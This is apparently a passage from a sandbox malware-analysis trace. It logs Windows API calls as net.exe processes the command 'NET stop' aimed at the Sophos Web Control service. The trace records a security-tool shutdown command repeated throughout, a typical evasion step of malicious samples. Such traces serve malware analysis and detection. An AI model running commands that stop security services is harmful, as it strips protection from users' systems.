FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0xc2 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NET\r\n [ ACCOUNTS | COMPUTER", _MaxCount=0x1e) returned 19 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x319 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="SERVICES\r\nNET START can be use", _MaxCount=0x1e) returned -5 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x483 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="SYNTAX\r\nThe following conventi", _MaxCount=0x1e) returned -5 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0xa86 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="NAMES\r\nThe following types of ", _MaxCount=0x1e) returned 4 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0x54 [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control", _String2="\r\nFor more information on tool", _MaxCount=0x1e) returned 97 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14塨W寮\x14") returned 0xad [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET ACCOUNTS\r\n[/FORCEL", _MaxCount=0x16) returned 18 [0199.537] LocalFree (hMem=0x575868) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x2e [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET COMPUTER\r\n\\\\comput", _MaxCount=0x16) returned 16 [0199.537] LocalFree (hMem=0x573f78) returned 0x0 [0199.537] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0x7d [0199.537] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET CONFIG SERVER\r\n[/A", _MaxCount=0x16) returned 16 [0199.538] LocalFree (hMem=0x575868) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x26 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET CONFIG\r\n[SERVER | ", _MaxCount=0x16) returned 16 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET CONTINUE\r\nservice\r", _MaxCount=0x16) returned 16 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x1b [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET FILE\r\n[id [/CLOSE]", _MaxCount=0x16) returned 13 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0xbe [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET GROUP\r\n[groupname ", _MaxCount=0x16) returned 12 [0199.538] LocalFree (hMem=0x575868) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x33 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x16) returned 11 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET HELPMSG\r\nmessage#\r", _MaxCount=0x16) returned 11 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0xc1 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET LOCALGROUP\r\n[group", _MaxCount=0x16) returned 7 [0199.538] LocalFree (hMem=0x575868) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x16 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x16) returned 3 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x33 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET SESSION\r\n[\\\\comput", _MaxCount=0x16) returned 15 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0x234 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET SHARE\r\nsharename\r\n", _MaxCount=0x16) returned 12 [0199.538] LocalFree (hMem=0x575868) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x13 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START BROWSER\r\n", _MaxCount=0x16) returned 14 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.538] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x16) returned 14 [0199.538] LocalFree (hMem=0x573f78) returned 0x0 [0199.538] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START EVENTLOG\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START MESSENGER\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START NET LOGON\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x16 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x11 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START RPCSS\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START SCHEDULE\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x12 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START SERVER\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0xf [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START UPS\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x17 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START WORKSTATION\r", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x18 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET START\r\n[service]\r\n", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x2a [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET STATISTICS\r\n[WORKS", _MaxCount=0x16) returned 14 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.539] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.539] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x16) returned 19 [0199.539] LocalFree (hMem=0x573f78) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14㽸W寮\x14") returned 0x58 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET TIME\r\n\r\n[\\\\compute", _MaxCount=0x16) returned -1 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0x184 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET USE\r\n[devicename |", _MaxCount=0x16) returned -2 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0xc7 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET USER\r\n[username [p", _MaxCount=0x16) returned -2 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0x47 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET VIEW\r\n[\\\\computern", _MaxCount=0x16) returned -3 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0xc2 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NET\r\n [ ACCOUNTS | ", _MaxCount=0x16) returned 19 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0x319 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="SERVICES\r\nNET START ca", _MaxCount=0x16) returned -5 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0x483 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="SYNTAX\r\nThe following ", _MaxCount=0x16) returned -5 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0xa86 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="NAMES\r\nThe following t", _MaxCount=0x16) returned 4 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0x54 [0199.540] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web", _String2="\r\nFor more information", _MaxCount=0x16) returned 97 [0199.540] LocalFree (hMem=0x579868) returned 0x0 [0199.540] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14顨W寮\x14") returned 0xad [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0199.541] LocalFree (hMem=0x579868) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14顨W寮\x14") returned 0x2e [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0199.541] LocalFree (hMem=0x573f78) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14㽸W寮\x14") returned 0x7d [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0199.541] LocalFree (hMem=0x579868) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14顨W寮\x14") returned 0x26 [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0199.541] LocalFree (hMem=0x573f78) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0199.541] LocalFree (hMem=0x573f78) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x1b [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0199.541] LocalFree (hMem=0x573f78) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14㽸W寮\x14") returned 0xbe [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0199.541] LocalFree (hMem=0x579868) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14顨W寮\x14") returned 0x33 [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0199.541] LocalFree (hMem=0x573f78) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0199.541] LocalFree (hMem=0x573f78) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14㽸W寮\x14") returned 0xc1 [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0199.541] LocalFree (hMem=0x579868) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14顨W寮\x14") returned 0x16 [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0199.541] LocalFree (hMem=0x573f78) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x33 [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0199.541] LocalFree (hMem=0x573f78) returned 0x0 [0199.541] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="顨W⡋瓢婢\x14㽸W寮\x14") returned 0x234 [0199.541] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0199.541] LocalFree (hMem=0x579868) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14顨W寮\x14") returned 0x13 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x16 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㶐W⡋瓢婢\x14㽸W寮\x14") returned 0x11 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573d90) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㶐W寮\x14") returned 0x14 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, 